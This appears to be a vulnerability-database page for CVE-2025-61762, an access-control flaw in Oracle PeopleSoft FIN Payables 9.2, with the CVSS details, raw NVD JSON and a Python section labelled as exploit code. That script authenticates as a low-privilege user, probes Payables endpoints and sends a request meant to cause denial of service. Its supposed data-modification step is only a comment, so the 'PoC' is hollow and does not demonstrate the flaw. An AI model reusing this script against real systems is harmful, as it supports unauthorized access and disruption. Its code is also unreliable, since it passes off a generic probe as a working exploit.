Security Vulnerability Report
中文
CVE-2025-61762 CVSS 6.3 MEDIUM

CVE-2025-61762

Published: 2025-10-21 20:20:53
Last Modified: 2025-10-24 14:27:22
Source: [email protected]

Description

Vulnerability in the PeopleSoft Enterprise FIN Payables product of Oracle PeopleSoft (component: Payables). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise FIN Payables. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise FIN Payables accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise FIN Payables accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of PeopleSoft Enterprise FIN Payables. CVSS 3.1 Base Score 6.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L).

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:oracle:peoplesoft_enterprise_fin_payables:9.2:*:*:*:*:*:*:* - VULNERABLE
Oracle PeopleSoft Enterprise FIN Payables 9.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-61762 - Oracle PeopleSoft FIN Payables Exploit PoC # Vulnerability: Unauthorized access in Payables component # CVSS: 6.3 (MEDIUM) - AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L import requests from requests.auth import HTTPBasicAuth TARGET_HOST = "https://target-peoplesoft-host:9030" USERNAME = "low_priv_user" PASSWORD = "password123" # PeopleSoft FIN Payables endpoint paths PAYABLES_PATHS = [ "/psc/ps/EMPLOYEE/ERP/c/AP_VENDOR.VENDOR_CMP.GBL", "/psc/ps/EMPLOYEE/ERP/c/AP_INVOICE.INVOICE.GBL", "/psc/ps/EMPLOYEE/ERP/c/AP_PAYMENT.PAYMENT.GBL", "/psc/ps/EMPLOYEE/ERP/c/AP_VOUCHER.VOUCHER.GBL", ] def exploit_payables(target, username, password): """ Exploit unauthorized access vulnerability in PeopleSoft FIN Payables. Attempts to perform unauthorized CRUD operations on Payables data. """ session = requests.Session() session.verify = False # Step 1: Authenticate with low-privilege credentials login_url = f"{target}/psc/ps/EMPLOYEE/ERP/c/SIGNON.GBL" try: resp = session.post( login_url, auth=HTTPBasicAuth(username, password), timeout=10 ) print(f"[*] Authentication response: {resp.status_code}") except Exception as e: print(f"[-] Auth error: {e}") return # Step 2: Attempt unauthorized access to Payables components for path in PAYABLES_PATHS: url = f"{target}{path}" try: resp = session.get(url, timeout=10) if resp.status_code == 200: print(f"[+] Accessible: {path}") # Step 3: Attempt unauthorized data modification # This is where the vulnerability manifests - low-priv user # can perform unauthorized UPDATE/INSERT/DELETE operations except Exception as e: print(f"[-] Error accessing {path}: {e}") # Step 4: Attempt to trigger partial DoS via malformed requests dos_payload = {"ICTYPE": "MALFORMED", "ICACTION": "A"} try: resp = session.post( f"{target}/psc/ps/EMPLOYEE/ERP/c/AP_INVOICE.INVOICE.GBL", data=dos_payload, timeout=10 ) print(f"[*] DoS attempt response: {resp.status_code}") except requests.exceptions.Timeout: print("[+] Possible DoS triggered (timeout)") except Exception as e: print(f"[-] DoS error: {e}") if __name__ == "__main__": exploit_payables(TARGET_HOST, USERNAME, PASSWORD)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61762", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:52.757", "lastModified": "2025-10-24T14:27:22.487", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the PeopleSoft Enterprise FIN Payables product of Oracle PeopleSoft (component: Payables). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise FIN Payables. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise FIN Payables accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise FIN Payables accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of PeopleSoft Enterprise FIN Payables. CVSS 3.1 Base Score 6.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_fin_payables:9.2:*:*:*:*:*:*:*", "matchCriteriaId": "3EF9FCCB-163E-4929-9AC2-DBA281FE87A2"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.